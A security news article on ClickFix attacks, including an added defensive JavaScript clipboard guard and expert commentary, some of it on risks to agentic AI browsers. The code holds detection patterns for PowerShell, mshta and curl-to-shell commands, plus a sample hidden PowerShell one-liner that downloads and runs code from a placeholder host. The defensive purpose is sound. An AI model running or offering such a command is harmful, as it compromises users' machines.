ClickFix attacks have exploded over the last year, evolving into one of the most effective forms of social engineering seen in the wild. By convincing users to copy and run malicious code on their own devices, bad actors have turned one of the oldest trust mechanisms in computing (copy-and-paste) into a weapon.
At Push Security’s recent threat briefing in London, researchers showcased the most sophisticated ClickFix page observed to date. It’s a glimpse into how fast these attacks are developing, and how far they’ve come from crude proof-of-concepts just a year ago.
A New Level of Deception
The standout example was a Cloudflare-themed lure that could easily fool even the most cautious users. The page looks legitimate, a near-perfect imitation of a Cloudflare bot-check page, complete with an embedded instructional video, a live countdown timer, and a counter showing “verified users in the last hour.” Every detail is designed to amplify authenticity and urgency.
Behind the slick design, the code is equally advanced. The page automatically adapts to the visitor’s device (serving tailored instructions for Mac users) and quietly copies malicious code to the clipboard through JavaScript. The victim believes they’re fixing a connection issue, but in reality, they’re launching a compromise.
For years, awareness campaigns have told users not to click suspicious links or download random files. But few have been trained to question what happens when a trusted webpage asks them to open a terminal and paste in a command. That’s what makes ClickFix so effective: it hijacks muscle memory, not just judgment.
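The clipboard write described above is the one step a defender can observe inside the browser. The following is an added example (not code from the Push Security briefing or any product): a heuristic guard that wraps a Clipboard-like object's writeText, flags text that looks like a copy-and-run command, and drops it before it reaches the clipboard. The indicator list, the fake clipboard and the sample one-liner with its placeholder host are all constructed for this illustration.

```javascript
// Defensive clipboard guard (constructed example) for the copy-and-run pattern above.
const INDICATORS = {
  powershell: /\bpowershell(\.exe)?\b|\bpwsh\b/i,
  mshta: /\bmshta(\.exe)?\b/i,
  cmd: /\bcmd(\.exe)?\s+\/[ck]\b/i,
  shell_pipe: /\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b/i,
  download_exec: /\biex\b|invoke-expression|\biwr\b|invoke-webrequest|downloadstring/i,
  hidden_window: /[-\/]w(indowstyle)?\s+hidden\b/i,
  remote_url: /\bhttps?:\/\/\S+/i,
};
// An interpreter name alone ("powershell Get-Date") is not enough; require a second signal.
const INTERPRETERS = ['powershell', 'mshta', 'cmd', 'shell_pipe'];
function classifyClipboardText(text) {
  const reasons = Object.entries(INDICATORS)
    .filter(([, re]) => re.test(text))
    .map(([name]) => name);
  const hasInterpreter = reasons.some((r) => INTERPRETERS.includes(r));
  return { suspicious: hasInterpreter && reasons.length >= 2, reasons };
}
// Wraps a Clipboard-like object's writeText (navigator.clipboard in an extension content
// script). Note: document.execCommand('copy') is a separate path needing a 'copy' event hook.
function installClipboardGuard(clipboard, onSuspicious, { block = true } = {}) {
  const original = clipboard.writeText.bind(clipboard);
  clipboard.writeText = function guardedWriteText(text) {
    const verdict = classifyClipboardText(String(text));
    if (verdict.suspicious) {
      onSuspicious({ text: String(text), reasons: verdict.reasons });
      if (block) return Promise.resolve(); // resolve like the real API, but write nothing
    }
    return original(text);
  };
  return clipboard;
}
// Constructed stand-in for navigator.clipboard, synchronous so results can be read back.
function makeFakeClipboard() {
  const store = { value: '' };
  return { store, writeText(t) { store.value = t; } };
}
// Constructed ClickFix-style one-liner with a placeholder host (not a real sample).
const SAMPLE_CLICKFIX = 'powershell -w hidden -c "iex (iwr -useb https://example.invalid/verify)"';
function runDemo() {
  const clip = makeFakeClipboard();
  const alerts = [];
  installClipboardGuard(clip, (a) => alerts.push(a));
  clip.writeText('Meeting notes: see https://example.invalid/agenda'); // benign: stored
  const benignStored = clip.store.value;
  clip.writeText(SAMPLE_CLICKFIX); // flagged and blocked
  return { benignStored, alerts, storedAfterAttack: clip.store.value };
}
```

The heuristic is deliberately simple and will miss obfuscated commands; its value is that it acts at the moment of the clipboard write, before any paste and before EDR has anything to see.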
Beyond Email: The New Delivery Frontier
Unlike most phishing campaigns, the majority of ClickFix attacks aren’t coming through email at all. Push Security’s research shows that four in five intercepted ClickFix pages were reached via Google Search, through poisoned results and malicious advertising.
Attackers are either compromising legitimate sites through hosting or CMS flaws, or spinning up their own SEO-optimized clones. This shift away from email exploits a glaring blind spot in most security stacks. If your detection logic lives in the inbox, you’re already too late.
Even when ClickFix pages are delivered by email, they’re hard to detect. Attackers rotate domains, use bot protection to block scanners, and obfuscate code to evade signatures. And because the malicious action happens inside the browser sandbox, traditional monitoring tools can’t see it.
By the time endpoint protection gets involved, the user has already done the damage.
Payloads That Push Boundaries
ClickFix isn’t just evolving in delivery and design. Its payloads are diversifying, too. While PowerShell and mshta remain common, attackers are now abusing a broader range of legitimate binaries across operating systems.
One emerging technique, known as cache smuggling, takes this even further. By caching a disguised file locally, attackers can execute malicious code without ever making a visible web request, effectively pulling malware onto the device under the radar of most network defenses.
The logical next step? ClickFix campaigns that run entirely inside the browser, bypassing endpoint detection and response (EDR) tools altogether.
The Numbers Tell the Story
The 2025 Microsoft Digital Defense Report revealed that ClickFix accounted for 47% of initial access attempts last year, nearly half of all observed attacks. For an attack technique that barely registered two years ago, that’s a seismic shift.
The reason is simple: ClickFix collapses multiple stages of the kill chain into one. A single copy-and-paste action gives attackers the same level of access that once required a phishing link, a download, and a social engineering hook.
The Real Risk: A Single Point of Failure
For many organizations, EDR is now the only thing standing between a ClickFix attack and a full compromise. But EDR can’t be everywhere, particularly in environments where contractors and employees use unmanaged BYOD devices. When that final layer fails or misclassifies an alert, the attack slips through unnoticed.
ClickFix is a shift in how social engineering works, from tricking users into giving up credentials to tricking them into executing commands. And as long as browsers and operating systems allow clipboard interactions by default, attackers will keep exploiting that trust boundary.
Implications for Agentic AI
Lionel Litty, CISO and Chief Security Architect at Menlo Security, says it is notable that potentially 80% of ClickFix attacks trace back to poisoned Google search results.
“What’s really noteworthy is the implication for agentic AI. Agentic AI browsers (such as ChatGPT Atlas, Perplexity Comet, and standalone agents as well) are also liable to encounter this type of malicious prompt when performing tasks that involve visiting content found via Google searches. While these agents typically lack the ability to run commands, they can still be tricked into causing damage in many other ways, all while staying within the confines of the browser. It would not be surprising to see these attacks evolve to also target agents, just as we are seeing here that they have evolved to target multiple operating systems.”
Defense in Depth
James Maude, Field CTO at BeyondTrust, adds that the most modern cyber-attacks can be mitigated by the oldest of controls: least privilege and application control. “While EDRs can provide a line of reactive protection, this should be combined with the proactive protection of removing admin privileges and controlling application execution as part of a defense-in-depth approach. The fewer privileges the victim has, the lower the risk to the organization. If you can layer application control on top of that to prevent threat actors from downloading and launching malicious tools, that further reduces the risk.”
The reduction of privileges doesn’t just apply to the endpoint, as these types of malware often harvest credentials and session tokens for cloud and SaaS services, Maude says. “This means that any standing privilege that the user has on their endpoint, or in the cloud, could be exploited and used against them and their organization.”
Getting Users to Compromise Themselves
“All social engineering comes down to getting users to compromise themselves, and as attackers have to rely on more sophisticated methods beyond the grasp of typical users, they need to make it as simple as possible,” concludes John Bambenek, President at Bambenek Consulting. “Explainer videos are a logical next step, especially given they are trivial to create with generative AI now.”
Information Security Buzz News Editor
Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.